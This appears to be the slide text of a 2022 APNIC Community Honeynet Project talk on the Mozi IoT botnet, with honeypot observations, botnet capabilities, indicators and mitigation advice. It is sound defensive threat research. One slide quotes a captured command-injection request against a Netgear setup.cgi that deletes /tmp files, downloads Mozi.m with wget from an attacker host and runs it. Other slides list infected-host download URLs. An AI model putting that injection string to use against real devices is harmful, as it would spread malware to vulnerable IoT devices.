Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022, delivered on 14 December 2022.
Unmasking Careto through Memory Forensics (video in description)Andrew Case
Similar a Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022 (20)
3. Discussion
1. Background
2. Mozi (IoT) Botnet
3. Observations
4. Mitigation & Remediation
Note: credits to Anutsetsen Enkhzoright anutsetsen.e@khanbank.com for initial work on the research &
presentation
3
4. Background (Source of Data)
• APNIC Community Honeynet Project
oCollaboration with partners across AP
oIncluding capacity building related activities
• Honeypots & Honeynet
oAnything that interact with the honeypots is suspect
oConfirmed with observed actions + artifacts (payload, logs, etc)
• Types of Honeypots
oTelnet/SSH (Cowrie) ** relevant for this talk
o100++ sensors
4
5. What We Observe
• Attacks that spread via
o SSH & Telnet bruteforce
o Exploiting _known_ vulnerabilities
• Nature of
o Malware - cryptominers, ddos agents, etc
o Source of attack == infected devices*
• Left of the Hack
o Observations on attacker’s infrastructure
o Bot recruitments
o Scripts, malware payload, traffic
• Attacks that no one pays attention to ☺
• Share feeds with network operators (DASH) & partners
5
DDoS
Attack
timeline
Build/Buy Infrastructure
• Write malware
• Infect devices
• Setup Command & Control
“Left of the Hack”
“The Hack”
6. Mozi Botnet
• Discovered in September 2019 by Netlab
• Significant outbreak in Sept 2020 (100k
nodes)
• Targets IoT devices (MIPs, ARM, PPC and
x86)
• Uses unique P2P Command & Control
o BitTorrent Distributed Hash Table (DHT) as
carrier protocol
o Makes it robust & tricky* to track
• Some capabilities (from config)
o Perform a Ddos attack
o Update executable from given URL
o Execute command via shell or system()
o DNS Spoofing
o HTTP Session Hijacking (with JS)
o Mining
• Code base from other botnets
o Gafgyt
o Mirai
• Propagation
o 14 HTTP based exploits of via web
interface of IoT Devices
o Mainly Telnet**, FTP, SSH credentials
brute-force
6
7. 7
Nmap scan report for host-x.static.[redacted].net (219.x.y.184)
Host is up (0.062s latency).
PORT STATE SERVICE VERSION
53387/tcp open elf-exe ELF 32-bit executable file
This host was serving malware (http on port 53387). Shodan fingerprint the device as a DVR
8. Mozi Author ”taken custody” by LEA in 2021
https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/
Is it still
around?
8
9. 2022 - Still Active?
durian.fsck.my -- 93.56.202.158[10/Oct/2022:14:24:55 +0900]
"GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;
wget+http://93.56.202.158:53157/Mozi.m+-O+/tmp/netgear;
sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 301 0
Check your webserver logs for Mozi.a or Mozi.m
9
10. Observations in APNIC Honeynet Project
• In 05/2022, we observed an ELF binary “.i” in some URLs
o Post-login downloads
• Pattern looks familiar http://xxx.xxx.xxx.xxx:random_port/.i
• IP in URL can be the same as attacking host or different
Source IP (attacking/spreading) IP hosting binary:random_port
o2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766
o2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134
o2022-05-26T03:30:41.219380,95.154.75.244,hxxp://95.154.75.244:12107/.i,RU,44724
o2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224
o2022-05-26T07:58:51.970983,167.179.185.255,hxxp://31.168.218.95:28681/.i,AU,4764
o2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134
o2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273
10
1. Telnet username:password
2. wget http://x.x.x.x:nnnn/.1
11. The “.i” & Finding Mozi
o .i: ELF 32-bit LSB executable, ARM, EABI5 version 1
(GNU/Linux), statically linked, stripped
• SHA256
a04ac6d98ad989312783d4fe3456c53730b212c79
a426fb215708b6c6daa3de3
o Known to VirusTotal
• Finding Mozi
• Maybe we can find Mozi.m or Mozi.a on the webserver?
o If .i in $IP:PORT
o Then download $IP:PORT/mozi.a ||
$IP:PORT/mozi.m || $IP:PORT/Mozi.m ||
$IP:PORT/Mozi.a || $IP:PORT/config
11
14. IPs from AP Region (Last 7 Months)
[Snippet]
• 2022-12-12T23:57:24.533309,110.x.y.59,hxxp://110.x.y.59:43509/.i [Most Common]
• 2022-08-30T11:07:19.374102,202.x.y.26,hxxp://61.a.b.131:58871/.i [Alternative]
• 2022-10-18T12:34:38.452976,202.x.y.26,hxxp://219.a.b.184:53387/.i [Repeat Offender]
14
IPs from AP region by Operators
67%
15. Mitigation & Remediation (not just Mozi)
• The Usual Advice
oHarden Device – Patch, Strong Credentials, Access Controls
▪ But whose job is it anyways to monitor & remediate?
▪ Vulnerabilities sustain ‘old’ worm & bots
oTL;DR – Same Story
oThere must be a better way
oResponding after the fact
• Engagement with other stakeholders on the impact of insecure
IoTs, Awareness, Policies, PSIRTs
• Strengthen collaboration & the Eco-system
15